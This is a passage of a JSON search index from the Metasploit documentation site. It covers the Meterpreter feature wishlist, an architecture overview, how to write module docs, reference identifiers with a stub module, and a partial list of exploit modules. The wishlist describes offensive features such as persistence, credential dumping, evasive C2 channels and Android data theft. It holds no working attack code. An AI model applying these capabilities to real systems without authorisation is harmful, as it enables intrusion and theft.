will allow the native characters to be emitted by the Metasploit console. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-unicode-support.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-unicode-support.html"
  },"651": {
    "doc": "Wishlist",
    "title": "Wishlist",
    "content": "This document is our live wishlist of features and changes for the Metasploit Meterpreter payloads. The majority of this list came from a survey sent out to the community in early 2015. If you plan to work on one of these features, please add a note to the item, and reference any open tickets or pull requests that are relevant. This document only contains survey suggestions that were specific to Meterpreter. Duplicate and similar items have been combined. Items currently in development have been marked [IN PROGRESS] . Items landed to master have been marked [DONE] . Related open tickets (slightly broader than Meterpreter): . | [DONE] Make User-Agent easier to control across modules and more consistent | [IN PROGRESS] Comprehensively refactor Windows reverse_http stagers | [DONE] Python reverse HTTPS stager | [DONE] Port windows reverse_tcp &amp;amp; bind_tcp to Metasm. Was later found to be implemented in https://github.com/rapid7/metasploit-framework/pull/5214. | . Meterpreter Platform Support . | Mac Meterpreter | iOS Meterpreter | PHP Meterpreter should have equivalent functionality to Win32 | Python Meterpreter should have equivalent functionality to Win32 | POSIX Meterpreter should have equivalent functionality to Win32 (extract it from Win32 codebase) | Powershell Meterpreter | Some users indicated that the Python/PHP Meterpreters were important because the POSIX/Linux Meterpreter was not working for them | . Mimikatz Integration . | In-memory pass-the-hash (basically this runs a process as “netonly” I believe, then injects real credential hashes supplied by the user in order to perform network based auth to things with only a hash) | Exporting of certificates, keys, and tickets in base64 format (already supported) then down to real files on disk for the attacker info | Add on-target minidump extraction | Add sekurla::searchpasswords | Expand Mimikatz and contribute back to it | Integration of Mimikatz with the credential database | Latest version of Mimikatz to be used as the plugin | It would be great to have a method to generate a golden ticket for a specific period of time (month, 6-months, year) rather than only 10 years. | . Meterpreter Pivoting . | VPN Pivoting for Framework (WinPcap still better than nothing) | Reverse pivoting from the target machine back to the attacker (TCP/UDP) . For many years I’ve asked for this feature. Basically Meterpreter needs to be able to say, listen on port 8080 on victim 1 and it go through the Meterpreter session to port whatever (9060) on the attacker’s machine or a designated alternate IP. then, whenever someone hits that port it’s auto forwarded through the session. This could help out a lot for SMB capture, Post exploitation phishing, and other things like setting a user’s proxy to use your forwarded port instead of the corporate proxy. | Improved pivoting speed and latency | Pivoting that is reliable and works well with different transports. In particular, I want the ability to pivot one session through another even if the first session is reverse_tcp or reverse_https, regardless of the second sessions transport. This will be difficult without installing drivers, but I would like several useful, working transports that I know I can pivot reliably with. | Carry portforwards and other channels along with a migrate. | . Privilege Escalation . | Allow privilege escalation modules to increase the privileges of the current session instead of firing off a new session. | Automated privesc for all platforms - not just Windows. | Implement a “privup” command that is similar to getsystem which automatically tries to get higher privs using local exploits. Allow the user to specify a “force” flag to automatically try “dangerous” privilege escalations (kernel mode, etc) | Make the “local” modules more seamlessly accessible inside Meterpreter without requiring sending your session to background and running a local module separately against it.Would be nice to have a built-in Meterpreter command called “local” with tab complete that would list the local modules relevant to that platform/arch - then running one of the local modules auto selects your current session, spawns a new metepreter session and transfers you over to that session automatically if successful with a clear message/indication that your now in a new elevated Meterpreter session. | . Remote File Access . | [DONE] Console/Meterpreter: Support for uploading, downloading, deleting, renaming, and listing files using UTF-8 input and showing UTF-8 output, converting this in the Meterpreter payload as necessary to support accessing unicode paths on the target. | [DONE] Console: The ls command should support wildcards in the directory listing, ex: ls *.csv | [DONE] Console: The ls command should support sorting files by date, name, or size | [DONE] Console: The ls command should support listing MSDOS 8.3 (short) names if available on Windows | [DONE] Console: The download command should support filtering files based on a wildcard match (recursively, too) | [DONE] Console: The download command should mirroring an entire remote file system to a local directory (names, paths, and timestamps) | . Meterpreter Features . | Direct Powershell integration on Windows (load &amp;amp; run .NET runtimes from inside Meterpreter) | Remote (target-side) scripting | Builtin userland persistence | Builtin rootkit/bootkit payload persistence | Create payloads that only “install” on specific computers (based on hardware, windows domain, etc) | Acquire a physical RAM image without touching the disk. This currently requires uploading winpmem[64].sys to windows\\system32 and invoking it through post/windows/manage/driver_loader. As loaded winpmem.sys exposes the RAM as disk device I can then suck it through post/windows/manage/nbd_server. Please make this possible without dropping winpmem.sys to system32 folder if possible | Manage multiple Meterpreter processes as one session as described in #4715. Many times there have been situations where a keyscan, or sniffer was going and something else occurred that required migration or cancelling to perform an action. “Installing” jobs in processes less likely to die would allow a pentester to still move around as needed but also be able to have persistent tasks going. A pipe dream of this feature would be to install a “rev2system” jobs whereby I could migrate to a low priv status for accessing Cryptolib encrypted storage but also get back to SYSTEM when I’m done without needing to pop a shell again. Another pipe dream here would be to also have jobs that if the user logged out, then back in the next day and I had a shell come back then, I could re-attach to my running jobs and get their results . | PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn’t work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC | Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode) | Allow Meterpreter sessions to resolve L3 addresses (#4793) | Track whether or not the current session has admin credentials (#4633)d | Support Metasploit-side zlib compression of sessions | Being able to use Meterpreter instances to easily forward commands &amp;amp; exfil | Automatic cleanup and removal of session and any recorded persistence after predetermined amount of time (server-side) | Change desktop/phone background | Remote mouse control | Play sound on the remote system | Read words outloud via text to speech on the remote system | Volume control | RSS feed from reverse_http(s) mult-handler that I can connect a RSS reader to (or something like IFTTT) and get notices when new sessions are created | MessageBox popups | Call the system “open” command easily (ShellExecute on windows, launch intent on Android) | Gather credentials from Google Chrome | LNK (binary) modification: Editing a LNK file’s ICON location (for SMB capturing), “Starting Directory” (for DLL injection) or target binary would make some post exploitation tasks easier | “Pinned” app modification: Knowing which apps are pinned, and what they link to (be it taskbar or start menu) would be useful intelligence, but also being able to modify the target of these links would be better and a very easy user-land persistence. (Run this &amp;amp;&amp;amp; the real thing you want) | Remote Registry automation: Remotely editing or reading the registry of a remote system works currently (sometimes) but it has no smarts about if the Remote Registry service is on or not. It would be nice to automate the starting and stopping of the remote registry service as well as possibly warning the user if they are attempting to do this as SYSTEM (probably going to fail). The use case for this is installing persistence on lots of systems quickly as well as reading user lists, MRUs and other intelligence important keys. (like finding a system with the puTTY keys) | “ps” and “kill” for remote systems: This would remove the need to drop to a shell and attempt to remember how to format “taskkill” and “tasklist”’s argument list. Tasklist also automatically removes the IPC$ connection after it’s done so results in some annoying disconnected share viewing | Scheduled Tasks / AT: Many of the ways to pivot or stay persistent use AT or Scheduled Tasks, to do so. This functionality to do tasks both locally and on remote hosts would greatly decrease the number of times a pentester would need to drop to cmd.exe | [DONE] Execute with login credentials: When a user is no longer online it is overkill to PSEXEC (which would just net a SYSTEM shell anyways with MSF) and “RunAs” isn’t supported since it requires a password at a prompt, so adding a simple CreateProcesWithLogon feature would help with reviving dead tokens #4649 | ListDrives: Most of the time shares and other drives rather than just C:\\ are where important files are stored. This feature would list local storage (plus USB) and network storage (SMB connected drives with where they are connected from and as what user) to start, but this feature would need to grow to support “Cloud” drives as well, like Dropbox, Box, Google Drive, and SkyDrive. | Enumerables support in Railgun: Windows is full of “Enumerables” like EnumWindows that would be nice to have the ability to create code for. That example is bad since ExtAPI has EnumWindows now but the argument doesn’t go away for railgun | DACL / Permissions enumeration: This is just needed in general for privilege escalation enumeration, share permissions, and reporting (“Why did you have access to this share, it was only supposed to be for X”) | Gina/SSP support: This would probably need to be an injected “job” but the basic premise is an in-memory load of a SSP or inject into Gina so when a new login happens against the system a set of clear text credentials are captured. 2 extremely use cases would be on a terminal server, or a server that no one is logged into at the time of infection due to time zone or operating hour differences | Websnapshot: Currently there isn’t a way to weed out web applications once in a network. This feature would, using IE, or another method be able to generate a screenshot of what a page looks like in a browser (given a PROTOCOL/URL/PORT). Biggest requirement is auto-accepting any self signed SSL certs and showing when authentication is required. | On-target resource cloning: Allowing a pentester to drop a binary and clone the ICON (in particular) of a binary would add to the stealthiness of an operation and add attack opportunities that weren’t previously thought plausible | Scatterbomb: Persistence is difficult, and making sure your session doesn’t die because you chose the wrong process to migrate into or the user exited that process because the PDF looked hung. This would work by attempting OpenProcess on every process or a select list of processes and inject Meterpreter threads into them. But it would rely on the Mutex feature so that only one would be calling back at a time. Basically allowing for a resilient semi-persistent Meterpreter session that would save you from yourself when you accidentally type exit on the Meterpreter&amp;gt; prompt instead of your other terminal | Mutex checking binary exports: This follows up with the scatterbomb but essentially when installing persistence as a pentester I only install one because installing more than one would raise the noise level of a compromised host. If the binary/callback would check a mutex before doing anything and looping based on a timeout that even better. | OLE / Office Controls: This is basically an open ended feature request asking for support of for Office, mostly Outlook (like read newest emails, search email, etc). | Configurable character set conversation for Shell sessions and channels. When spawning a windows shell from meterpreter, on a host that uses a German version of windows, all the special characters (e.g. öäü) are broken, i.e. they are either not rendered at all, or replaced with that default “character not found” unicode character. Forcing the terminal emulator to use cp850 made it work for now. | . Metepreter Stager Support . | [DONE] Network error tolerant versions of existing stagers | [DONE] Tagged stagers that send the payload type, arch, platform during the staging process to enable shared listeners | [DONE] Stagers that contain an embedded unique ID that can be used to identify which payload triggered what session | [DONE] Stagers that are “stageless” for Meterpreter (include the entire main Meterpreter payload, plus any required extensions). In situations of high network latency or extreme network detection a non-staged exe is the only way to go. Ulta-met is a project that does this but isn’t as stable or easy to work with as if it were just built into the binary creation options. | [DONE] Stagers that are “stageless” for Meterpreter and include all potential functionality (all extensions) | . Meterpreter Transport Flexibility . | [DONE] Support for changing the transport (host, port, URL) of a live session to a new endpoint or protocol | [DONE] Support for multiple transports for the initial session, using the first transport that works | [DONE] Support for multiple endpoints across multiple transports for the initial session | [DONE] Support for automatic switching between multiple transports while the session is running | [DONE] Support for user-configured callback frequency and endpoint rotation | Support for Tor tunneling to .onion and internet-facing listeners | Support for time-based callback, such as limiting callbacks to certain times of the day. | Support for P2P style callbacks. Gossip protocol to find other Meterpreters on the network and use them as exfiltration point. This callback would reduce the amount of endpoints that would call “out” to a handler to 1. Whoever the “master” was. All comms would automatically (because, math) find and delegate this master and finally send through the master all of their comms. This could happen over a named pipe, or a forwarded port or something. (DHT?) | Support for DNS A/TXT transports | Support for UDP transports | Support for ICMP transports | Support for TLS encrypted bind listeners | Support for HTTP application listener (ie CGI mode Meterpreter session, tomcat servlets, etc) | Support for third-party communication transports (Github, Twitter, pastebin, etc) | Support for XMPP transports. Many organizations use IM and chat clients internally and support them going outbound. reverse_tcp being stopped for the most part these days and more and more catching reverse_http(s) due to proxies, this might become the next outlet. Possibly using server that are already established in the industry ;-) but mainly supporting XYZ jabber server as a pass through. This would probably be a very big piece of shellcode as I don’t believe any Windows OSs support XMPP out of the box. | Support for IE callback: One method deployed by some more infamous malware is to only communicate when IE is running and surfing and only by hooking IE to send comms. This callback would operate very much the same and would support any kind of proxy by default as IE does. | Support for Outlook callback: This callback would use email back and forth either directly to a MSF run SMTP server or through other services, but the C2 channel would be locally (not on the exchange filter system) auto-filtered to a non-visible folder (using PidTagAttributeHidden). This type of comms would greatly increase the lag time supported in Metepreter simply due to the inherent lag in email. | . Meterpreter HTTP Transport Options . | [DONE] Create a whitelist of allowed URLs on the handler, have these persistent between metasploit runs | [DONE] Indicate whether a given handler should silently accept, accept and report, or drop connections using unregistered URLs | [DONE] Whitelisted URLs should be referencing using an alias, stored persistently with the URL | [DONE] Session listing output should indicate what URL and URL alias a particular session is associated with | [DONE] URLs can be anywhere from 30 to 128 bytes long | . Meterpreter Proxy Support . | [DONE] Use Windows Credentials with NTLM Authentication to connect via System Proxy back to attacker | If Meterpreter executes as system - option to find a user, and use that users proxy settings for comms (temporarily or cleanup on exit) - maybe something like RunAsCurrentUser | [DONE] Better proxy support and the ability to sleep. Still more to done on burstable updates | . Communication Protection . | Authenticated callbacks: This is pretty straight forward, when a pentester no longer controls the IP they were attacking from and failed to clean up every binary and phishing email there is a chance of compromise by proxy. The problem was somewhat solved with SessionExpirationTimeout and SessionCommunicationTimeout but both of them are loaded in the stage, not hard coded into any binary built, so it’s very easy to get into this situation. Authenticated callbacks would allow a pentester to add a small layer of protections if this event were to happen and a callback from a client was sent to an IP no longer in the pentester’s control | Embedded TLS cert or hash of cert to verify Meterpreter instance on the Metasploit side | [DONE] Embedded TLS cert or hash of cert to verify Metasploit instance on the Meterpreter side | Embedded password to verify Meterpreter instance on the Metasploit side (challenge-response) | Embedded password to verify Metasploit instance on the Meterpreter side (challenge-response) | [DONE] Enable TLS verification to verify Metasploit instance on the Meterpreter side | [DONE] Allow open, relaxed, strict modes of payload authentication (everything, everything but flag unauthorized, drop non-authorized) | . Communications Evasion . | Emulation of common web application traffic when using HTTP-based transports | Change web application traffic emulation fingerprints on the fly when using HTTP-based transports | [DONE] Sleeping for a specified period of time before reconnecting to Metasploit | [DONE] Automatic shutdown/cleanup after a specified amount of time has passed | Traffic shaping or malleable communications, especially for HTTP(S), can be very useful for blending in, or even for adversary simulation. See Maligno (OSS - http://www.encripto.no/tools/) | Malleable network signatures in general | Malleable file artefacts - Make Meterpreter look like PlugX / Poison Ivy / etc. | Stealthier network comms (C2 DLL inject into web browser) | Better support to automatically identify applications that use a corporate proxy that allows outside connections and then leverage this application’s features | Emulate various real world malware | Being able to use Meterpreter instances to easily forward commands &amp;amp; exfil | Supporting a set URI path for reverse_http(s), so you can use other webservers as a reverse proxy. | . Session Handlers . | [DONE] Generate a unique ID for each session (target-side) | [DONE] Generate a unique ID for each generated payload Backdooring/Persisting on more than 10 machines over months it gets very difficult to know when a host hasn’t called back in a while or when a new host arrives. This would need not to be based on gateway, local IP, or any other transient information. This can be processed at any step as long as when STDAPI is loaded I can quickly identify if it’s a system that I’ve known about, and how long it’s been since I’ve seen it. | Shared listeners that can stage multiple payload architectures and platforms (using tags). Depends on new stagers and a new listener and unique IDs. [IN PROGRESS] | [DONE] Track the last time a given session checked in | Track user defined state data in the db, such as specific user / member of group logged in, specific shares open, certain tuple of IP:port in network connections (1.2.3.4 over 22 where 1.2.3.4 is an IP of interest) | Reconnecting payloads will have different IPs, take this into account for session methods (peerinfo/tunnelinfo, etc) | . Session Reliability . | [DONE] Metasploit payloads should always restore connections if there is a network error unless the user explicitly kills the session | Improve reliability, encryption, authentication. Better integration for custom payloads. | Spawn a new session before running a module that could crash the current session (mostly privilege escalation, but some buggy post modules too [railgun]) | Meterpreter should work robustly in a VM, on a cloud server, or through corp proxies | . Android Meterpreter Features . | Android gather modules for auth tokens &amp;amp; sqlite databases (call logs, contacts, email, etc) | [DONE] Android lock screen removal | Crack the lock screen hash to reveal the password, pin code or gesture | Remote screen control | Add record_mic_stream (trigger based on event, like phone call) | [DONE] Grab photos from front and rear cameras | Android desktop background, sound play, vibrate, screenshot | [DONE] Quickly grab GPS coordinates | Windows post module to install Meterpreter on any attached android devices | Better pivoting (e.g bridging between WiFi and 4g) | More root exploits | Dump browsing history and cookies | Comprehensive test suite (including rspec) | ARM/POSIX Meterpreter | [DONE] Support for native payloads in the addJavascriptInterface exploit | . Payload Generation . | Msfvenom should support injecting into existing APKs for Android Meterpreter deployment. Otherwise, it’s just an app the target installs for 10 seconds and removes after confirming it has no user interface, barely allowing the Meterpreter session to be created. [IN PROGRESS] | Msfvenom really needs to spit out some C# payloads. You can pretty easily modify some of the powershell ones to be C#, but there really ought to be a built in C# payload. | [DONE] Generated payloads should default to exiting the process when the shellcode completes | [DONE] Payload generation should allow named UUIDs to be injected into payloads | . Unit testing for payloads . | Metasploit payload classes should have specs, new specs should be created when any class is changed if there isn’t an existing spec. | Metasploit payload tests that can run in Github Actions, should be automatically tested end-to-end | Metasploit payload tests that can’t run in GitHub Actions should be run by Jenkins and target a virtual machine (local or cloud-hosted). | Meterpreter payloads should test every advertised console command. | Meterpreter payloads should test a subset of the full APIs available. | . Meterpreter Specifications . | These define compatibility, quality, and order of preference for Meterpreter payload modules, including stages and stages. | Payload Flags (for matching with exploits/generators/handlers): . | Supports SSL | Supports ZLIB | Staged / Unstaged | . | Quality Rank (for prioritizing bugs/feature work): . | Leverage using Rank system | Windows: Excellent | Python: Great | Java: Good | PHP: Normal | POSIX: Normal | . | Capabilities (queried post-stage to determine features): . | Filesystem | Registry | Pivoting (sockets) | Pivoting vpn) | Process listing, kill, execute | Process memory read, write, injection | Migration | . | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-wishlist.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-wishlist.html"
  },"652": {
    "doc": "Overview",
    "title": "Architecture",
    "content": "To avoid confusion, the victim running meterpreter is always called the server and the ruby side controlling it is always called the client, regardless of the direction of the network transport connection. The Meterpreter server is broken into several pieces: . | metsrv.dll and meterpreter.{jar,php,py} - this is the heart of meterpreter where the protocol and extension systems are implemented. | ext_server_stdapi.{dll,jar,php,py} - this extension implements most of the commands familiar to users. | ext_server_*.{dll,jar,php,py} - other extensions provide further functionality and can be specific to particular environments. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#architecture",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#architecture"
  },"653": {
    "doc": "Overview",
    "title": "Delivering Meterpreter",
    "content": ". | Using a technique developed by Stephen Fewer called Reflective DLL Injection (RDI), metsrv.dll’s header is modified to be usable as shellcode. From there, Metasploit can embed it in an executable or run it via an exploit like any other shellcode. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#delivering-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#delivering-meterpreter"
  },"654": {
    "doc": "Overview",
    "title": "Overview",
    "content": "Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written in C by Matt “skape” Miller, dozens of contributors have provided additional code, including implementations in PHP, Python, and Java. The payload continues to be frequently updated as part of Metasploit development. Meterpreter development occurs in the metasploit-payloads repository and the compiled results are published as part of the metasploit-payloads gem. For a detailed understanding of the Meterpreter architecture, please review the original specification. Additional documentation about Meterpreter can be found on this wiki: . | Meterpreter Reliable Network Communication | Meterpreter Transport Control | Meterpreter HTTP Communication | Meterpreter Timeout Control | Meterpreter Sleep Control | Meterpreter Stageless Mode | Meterpreter Unicode Support | Meterpreter Configuration | Payload UUID | . Extension-specific documentation: . | Python Extension | Powershell Extension | . A wishlist of features is maintained at the Meterpreter Wishlist page. Examples of specific use cases can also be found on this wiki: . | Meterpreter Paranoid Mode | . Those interested in the technical details of Meterpeter, along with rationale behind some of the implementations, should read the following: . | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers | . Got dead Meterpreter sessions? Read this: Debugging Dead Meterpreter Sessions. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html"
  },"655": {
    "doc": "Module Documentation",
    "title": "Module Documentation",
    "content": "You can now generate documentation for modules on the fly using the info -d command. Module documentation allows you to see the help for a particular module from a web page, instead of from the command line. The help page includes: . | The PR history related to a particular module, if you have a GitHub access token set up. | The basic usage instructions for a module. | The advanced usage instructions for a module, if it’s available. | . How to use it . After you load a module, you can type info -d to generate a help page that provides basic usage information and displays the PR history for the module. msf&amp;gt; use auxiliary/scanner/smb/smb_login msf (smb_login)&amp;gt; info -d . Additionally, if it’s available, the help page will also include a KB that contains advanced usage information, such as vulnerable target details, caveats, and sample usage. The content in the KB is contained in a markdown file in the metasploit-framework/documentation/modules directory. Its purpose is to provide supplemental information that is outside of the scope of general documentation. Add an access token to see PR history . In order for you to be able to view the PR history for a module, you’ll need add your GitHub access token to the environment variable GITHUB_OAUTH_TOKEN=\"&amp;lt;your token here&amp;gt;\" in .bash_profile. To generate a GitHub access token, check out this page. The token will need to have a scope for repos. How you can write KBs . Generally, the person who creates the module will write the initial KB for it, but anyone can write or contribute to it. Before you write a KB, you should take a look at the sample template, module_doc_template.md, or take a look at any of the KBs that are already available. To write a KB, you’ll need to: . | Create an markdown (.md) file. | Write the content. | Save the file and name it after the module name. For example, the filename for ms08_067_netapi.rb is called ms08_067_netapi.md. | Place it in the metasploit-framework/documentation/modules directory as directed below. | . Where to put the KB files . If you go to metasploit-framework/documentation/modules, you’ll see that there are documentation directories for each module type: auxiliary, exploit, payload, and post. To figure out where you need to put the file, you’ll need to look at the module name. | Start msfconsole. | Type use &amp;lt;module name&amp;gt;. | Type info. | When the module name appears, look at the Module field. You’ll see a file path for the module. That’s the path where the KB needs to be added. | . For example: . msf&amp;gt; use auxiliary/scanner/smb/smb_login msf (smb_login)&amp;gt; info Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login .... If you were creating a KB for the smb login scanner, you’d add it to metasploit-framework/documentation/modules/auxiliary/scanner/smb. Sections you should include in the KB . These are just suggestions, but it’d be nice if the KB had these sections: . | Vulnerable Applications - Tells users what targets (version numbers) are vulnerable to the module and provides instructions on how to access vulnerable targets for testing. If possible provide a download link and any setup instructions to configure the software appropriately. | Verification Steps - Tells users how to use the module and what the expected results are from running the module. | Options - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. | Scenarios - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date. | . ",
    "url": "/docs/using-metasploit/basics/module-documentation.html",
    "relUrl": "/docs/using-metasploit/basics/module-documentation.html"
  },"656": {
    "doc": "Module Reference Identifiers",
    "title": "On this page",
    "content": ". | List of supported reference identifiers | Code example of references in a module | . A reference in a Metasploit module is a source of information related to the module. This can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. The more you have the better. However, you should not use this as a form of advertisement. ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#on-this-page"
  },"657": {
    "doc": "Module Reference Identifiers",
    "title": "List of supported reference identifiers",
    "content": "| ID | Source | Code Example | . | CVE | cvedetails.com | ['CVE', '2014-9999'] | . | CWE | cwe.mitre.org | ['CWE', '90'] | . | BID | securityfocus.com | ['BID', '1234'] | . | MSB | technet.microsoft.com | ['MSB', 'MS13-055'] | . | EDB | exploit-db.com | ['EDB', '1337'] | . | US-CERT-VU | kb.cert.org | ['US-CERT-VU', '800113'] | . | ZDI | zerodayinitiative.com | ['ZDI', '10-123'] | . | WPVDB | wpvulndb.com | ['WPVDB', '7615'] | . | PACKETSTORM | packetstormsecurity.com | ['PACKETSTORM', '132721'] | . | URL | anything | ['URL', 'http://example.com/blog.php?id=123'] | . | AKA (deprecated*) | anything | ['AKA', 'shellshock'] | . Good to know AKA names for modules are no longer stored as a reference identifier, but rather in the Notes metadata field as shown in the example below. ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#list-of-supported-reference-identifiers",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#list-of-supported-reference-identifiers"
  },"658": {
    "doc": "Module Reference Identifiers",
    "title": "Code example of references in a module",
    "content": "class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Code Example', 'Description' =&amp;gt; %q{ This is an example of a module using references }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Unknown' ], 'References' =&amp;gt; [ [ 'CVE', '2014-9999' ], ['BID', '1234'], ['URL', 'http://example.com/blog.php?id=123'] ], 'Platform' =&amp;gt; 'win', 'Targets' =&amp;gt; [ [ 'Example', { 'Ret' =&amp;gt; 0x41414141 } ] ], 'Payload' =&amp;gt; { 'BadChars' =&amp;gt; \"\\x00\" }, 'Privileged' =&amp;gt; false, 'DisclosureDate' =&amp;gt; '2014-04-01', 'DefaultTarget' =&amp;gt; 0, 'Notes' =&amp;gt; { 'AKA' =&amp;gt; [ 'shellshock' ] } ) ) end def exploit print_debug('Hello, world') end end . ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module"
  },"659": {
    "doc": "Module Reference Identifiers",
    "title": "Module Reference Identifiers",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html"
  },"660": {
    "doc": "Modules",
    "title": "Metasploit modules",
    "content": "There are currently 5693 Metasploit modules: . Expand All Collapse All . | All Modules . | auxiliary (1266) . | admin (223) . | 2wire (1) . | auxiliary/admin/2wire/xslt_password_reset | . | android (1) . | auxiliary/admin/android/google_play_store_uxss_xframe_rce | . | appletv (2) . | auxiliary/admin/appletv/appletv_display_image | auxiliary/admin/appletv/appletv_display_video | . | atg (1) . | auxiliary/admin/atg/atg_client | . | aws (1) . | auxiliary/admin/aws/aws_launch_instances | . | backupexec (2) . | auxiliary/admin/backupexec/dump | auxiliary/admin/backupexec/registry | . | chromecast (2) . | auxiliary/admin/chromecast/chromecast_reset | auxiliary/admin/chromecast/chromecast_youtube | . | citrix (1) . | auxiliary/admin/citrix/citrix_netscaler_config_decrypt | . | db2 (1) . | auxiliary/admin/db2/db2rcmd | . | dcerpc (4) . | auxiliary/admin/dcerpc/cve_2020_1472_zerologon | auxiliary/admin/dcerpc/cve_2022_26923_certifried | auxiliary/admin/dcerpc/icpr_cert | auxiliary/admin/dcerpc/samr_computer | . | dns (1) . | auxiliary/admin/dns/dyn_dns_update | . | edirectory (2) . | auxiliary/admin/edirectory/edirectory_dhost_cookie | auxiliary/admin/edirectory/edirectory_edirutil | . | emc (2) . | auxiliary/admin/emc/alphastor_devicemanager_exec | auxiliary/admin/emc/alphastor_librarymanager_exec | . | firetv (1) . | auxiliary/admin/firetv/firetv_youtube | . | hp (3) . | auxiliary/admin/hp/hp_data_protector_cmd | auxiliary/admin/hp/hp_ilo_create_admin_account | auxiliary/admin/hp/hp_imc_som_create_account | . | http (89) . | auxiliary/admin/http/allegro_rompager_auth_bypass | auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss | auxiliary/admin/http/atlassian_confluence_auth_bypass | auxiliary/admin/http/axigen_file_access | auxiliary/admin/http/cfme_manageiq_evm_pass_reset | auxiliary/admin/http/cisco_7937g_ssh_privesc | auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 | auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 | auxiliary/admin/http/cisco_ssm_onprem_account | auxiliary/admin/http/cnpilot_r_cmd_exec | auxiliary/admin/http/cnpilot_r_fpt | auxiliary/admin/http/contentkeeper_fileaccess | auxiliary/admin/http/dlink_dir_300_600_exec_noauth | auxiliary/admin/http/dlink_dir_645_password_extractor | auxiliary/admin/http/dlink_dsl320b_password_extractor | auxiliary/admin/http/foreman_openstack_satellite_priv_esc | auxiliary/admin/http/fortra_filecatalyst_workflow_sqli | auxiliary/admin/http/gitlab_password_reset_account_takeover | auxiliary/admin/http/gitstack_rest | auxiliary/admin/http/grafana_auth_bypass | auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921 | auxiliary/admin/http/hp_web_jetadmin_exec | auxiliary/admin/http/ibm_drm_download | auxiliary/admin/http/idsecure_auth_bypass | auxiliary/admin/http/iis_auth_bypass | auxiliary/admin/http/intersil_pass_reset | auxiliary/admin/http/iomega_storcenterpro_sessionid | auxiliary/admin/http/ivanti_vtm_admin | auxiliary/admin/http/jboss_bshdeployer | auxiliary/admin/http/jboss_deploymentfilerepository | auxiliary/admin/http/jboss_seam_exec | auxiliary/admin/http/joomla_registration_privesc | auxiliary/admin/http/kaseya_master_admin | auxiliary/admin/http/katello_satellite_priv_esc | auxiliary/admin/http/limesurvey_file_download | auxiliary/admin/http/linksys_e1500_e2500_exec | auxiliary/admin/http/linksys_tmunblock_admin_reset_bof | auxiliary/admin/http/linksys_wrt54gl_exec | auxiliary/admin/http/manage_engine_dc_create_admin | auxiliary/admin/http/manageengine_dir_listing | auxiliary/admin/http/manageengine_file_download | auxiliary/admin/http/manageengine_pmp_privesc | auxiliary/admin/http/mantisbt_password_reset | auxiliary/admin/http/mutiny_frontend_read_delete | auxiliary/admin/http/netflow_file_download | auxiliary/admin/http/netgear_auth_download | auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass | auxiliary/admin/http/netgear_r6700_pass_reset | auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce | auxiliary/admin/http/netgear_soap_password_extractor | auxiliary/admin/http/netgear_wnr2000_pass_recovery | auxiliary/admin/http/nexpose_xxe_file_read | auxiliary/admin/http/novell_file_reporter_filedelete | auxiliary/admin/http/nuuo_nvrmini_reset | auxiliary/admin/http/openbravo_xxe | auxiliary/admin/http/pfadmin_set_protected_alias | auxiliary/admin/http/pihole_domains_api_exec | auxiliary/admin/http/rails_devise_pass_reset | auxiliary/admin/http/scadabr_credential_dump | auxiliary/admin/http/scrutinizer_add_user | auxiliary/admin/http/sophos_wpa_traversal | auxiliary/admin/http/supra_smart_cloud_tv_rfi | auxiliary/admin/http/sysaid_admin_acct | auxiliary/admin/http/sysaid_file_download | auxiliary/admin/http/sysaid_sql_creds | auxiliary/admin/http/telpho10_credential_dump | auxiliary/admin/http/tomcat_administration | auxiliary/admin/http/tomcat_ghostcat | auxiliary/admin/http/tomcat_utf8_traversal | auxiliary/admin/http/trendmicro_dlp_traversal | auxiliary/admin/http/typo3_news_module_sqli | auxiliary/admin/http/typo3_sa_2009_001 | auxiliary/admin/http/typo3_sa_2009_002 | auxiliary/admin/http/typo3_sa_2010_020 | auxiliary/admin/http/typo3_winstaller_default_enc_keys | auxiliary/admin/http/ulterius_file_download | auxiliary/admin/http/vbulletin_upgrade_admin | 